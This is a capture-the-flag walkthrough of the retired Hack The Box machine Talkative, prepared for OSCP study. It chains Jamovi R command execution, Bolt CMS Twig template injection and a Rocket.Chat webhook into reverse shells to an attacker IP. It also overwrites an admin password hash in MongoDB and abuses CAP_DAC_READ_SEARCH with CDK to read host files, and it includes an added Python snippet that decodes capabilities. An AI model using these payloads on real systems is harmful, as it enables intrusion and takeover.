OSCP PREPARATIONS – HTB Talkative

Talkative is a retired Hack The Box machine running Linux; the goal is to exploit its vulnerabilities and obtain the user and root flags.
We start with an nmap network scan to get to know the target machine.
Classic Scan

Full Port Scan

The scan shows 22/tcp filtered (ssh), 80/tcp Apache httpd 2.4.52, 3000/tcp ppp, and 8080/tcp, 8081/tcp and 8082/tcp all running Tornado httpd 5.0.
SSH is filtered by a firewall, so let's enumerate the remaining ports in order.
Port 80

The site uses Bolt as its CMS; submitting the contact form produces an error that reveals bolt is the directory.
Browsing to it redirects us to the login screen.

We try the default credentials and inspect the page source; neither yields anything, so we note it and continue.
The homepage contains a link to port 3000.

Port 3000

It redirects to Rocket.Chat.
There is an account registration page; let's create an account for ourselves and enumerate from inside.
If you get the error "The email entered is invalid / Invalid email" when creating the account, use an email address with the domain talkative.htb.

We were able to log in after creating the user

We could not find anything of particular interest here, except that there is an admin named Saul Goodman; we note it and move on.

Port 8080
We enumerate this port.

It points us to the R language.
We could not enumerate ports 8081 and 8082, which return 404 Not Found. A gobuster scan could be run in case an API is exposed there, but we skip directory brute-forcing for now since we do not need it.

On port 8080 we are redirected to the Jamovi spreadsheet web application; let's continue with this.

Using the R editor, we see that we can execute commands.

Let's google and see whether we can run an OS command here.

Following those examples, we typed the command:
try(system("whoami", intern = TRUE))

It ran successfully.
Let's try a reverse shell here with the following command:
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/4747 0>&1'
We were able to get a shell.

We see that the shell we got is inside a Docker container.

Here we perform local enumeration.
The bolt-administration.omv file under the root directory is noteworthy: it is reported to be a zip archive. We could not open it on the target machine, so we transferred it to our machine with nc and unzipped it there.

After unzipping the files, we find credential information in the xdata.json file:

matt@talkative.htb
janit@talkative.htb
saul@talkative.htb
jeO09ufhWD<s
bZ89h}V<S_DA
)SQWGm>9KHEA


We note this information.
With a bit of guesswork we tried these passwords against the admin user in Bolt CMS.
We were able to log in as admin with the password jeO09ufhWD<s.

Here we enumerate.

In the File management section we look at the View & edit templates section.
We click on the base-2021 option, since we saw that the page source uses the 2021 theme.

We edit the index.twig file to see whether the web page changes.

We broke the web page here 🙂

Since the code we added works, we searched Google for whether code injection is possible here.

Let’s run this code

It works, so let's create a reverse shell for ourselves:
{{["/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/4700 0>&1'"]|filter('system')}}

After saving, we refreshed the web page and got our shell.

Again we are inside a Docker container, where we enumerate.

We found that most of our usual tools were missing.

SSH was filtered in the nmap scan; let's see whether an internal SSH connection is allowed.
We tried the admin and the user names we found, and finally we were able to log in as the user saul:
ssh saul@172.17.0.1
password jeO09ufhWD<s

This way we got our user flag.

Since our privileges are limited here, we continue with local enumeration.

Here update_mongo.py caught our attention.
We could not access this file. MongoDB is used by it but is not running on this machine, so we suspect another Docker container.

MongoDB's default port is 27017, and we found that the host listening on this port is 172.17.0.2:
echo > /dev/tcp/172.17.0.2/27017; echo $?

To access the service we will use the chisel tool. First we download chisel from GitHub, then we start a web server so that the target machine can download it from us.

From the target machine we download chisel.

Now we make the target machine a chisel client and our attacker machine the chisel server, so that the MongoDB on the target network can be reached from our machine.

Then we connected with mongosh.

After connecting, we followed the MongoDB pentesting section on HackTricks: we listed the databases, then the collections, and in the meteor database we found the users.

Here we saw the user we created ourselves.

Rather than cracking the admin password, let's change the admin password in Rocket.Chat and log in with it.
We looked up on Google how to change it.

db.getCollection('users').update({username: "admin"}, { $set: {"services" : {"password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })
Using this command we changed the admin user's password to 12345.

Let's access Rocket.Chat.

We are logged in as admin.
Here we enumerated and found that the version is old.

We looked for an exploit for this version.

Here we executed the given commands.

We edited the given command as follows and saved it:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('/bin/bash -c "bash -i >& /dev/tcp/10.10.14.19/8000 0>&1"');

After clicking Save changes

We will make a request to the webhook URL:
http://talkative.htb:3000/hooks/xjuij3wPdDjLBFzrE/vJmjSPsRfRFkYHY5uS4qPp5QHzzg4kmJHSiev2vTbbKgEJiA
We start an nc listener first,
then make the request with curl.

As you can see, we got a root shell.
We're in yet another fucking Docker container.
There was nothing interesting in this container, so I decided to check which capabilities we have.

The capsh binary is not available on the target, but another way to view the capabilities is to read /proc/self/status on the target and decode the value with capsh on our local machine.

The CapBnd line shows a value of 00000000a80425fd.
Let's decode it on our own machine to see the capabilities.

Here we can see that we have CAP_DAC_READ_SEARCH, which lets us read all files on the host machine.
I searched for exploits I could use for this.
We came across CDK.
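The decoding step above, as an added example that is not part of the original writeup: a small Python decoder for the Cap* masks in /proc/<pid>/status (the same result capsh --decode gives), which also diffs the mask against Docker's default bounding set so an auditor can spot which capability was added beyond the default. The /proc/self/status lines are a constructed sample using the page's CapBnd value; the Docker default mask is assumed to be the current engine default.

```python
# Added example (not from the original writeup): decode a Cap* hex mask from
# /proc/<pid>/status into capability names and compare it with Docker's default.
import re

# Capability names in bit order, from linux/capability.h (bit index == constant).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# Assumption: Docker's default bounding set for an unprivileged container.
DOCKER_DEFAULT_MASK = "00000000a80425fb"

def decode_caps(mask_hex):
    # Bit n set in the mask means capability number n is present.
    mask = int(mask_hex, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]

def cap_field(status_text, field="CapBnd"):
    # Extract one Cap* line (CapBnd, CapEff, ...) from /proc/<pid>/status text.
    m = re.search(r"^%s:\s*([0-9a-fA-F]+)$" % field, status_text, re.M)
    if not m:
        raise ValueError("no %s line in status text" % field)
    return m.group(1)

def diff_vs_docker_default(mask_hex):
    # (granted beyond the default, dropped from the default) -> what an auditor flags.
    have, default = set(decode_caps(mask_hex)), set(decode_caps(DOCKER_DEFAULT_MASK))
    return sorted(have - default), sorted(default - have)

# Constructed sample of the relevant /proc/self/status lines seen on the target.
SAMPLE_STATUS = "Name:\tbash\nCapEff:\t00000000a80425fd\nCapBnd:\t00000000a80425fd\n"

if __name__ == "__main__":
    bnd = cap_field(SAMPLE_STATUS, "CapBnd")
    print("CapBnd", bnd, "=", ", ".join(decode_caps(bnd)))
    extra, missing = diff_vs_docker_default(bnd)
    print("beyond Docker default:", extra, "| dropped:", missing)
```

Running it on the page's value lists the 14 capabilities and reports CAP_DAC_READ_SEARCH as the one granted beyond the default (with CAP_DAC_OVERRIDE dropped), which is exactly the capability the rest of the walkthrough abuses.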

I downloaded the tool to my machine and transferred it to the target; since the target machine does not have nc, curl or wget, I transferred it with cat.

After transferring cdk to the target machine:
./cdk run cap-dac-read-search /root/root.txt
We read the root flag.
Instead of just reading the root flag, we could also have added an SSH key here and obtained a root shell.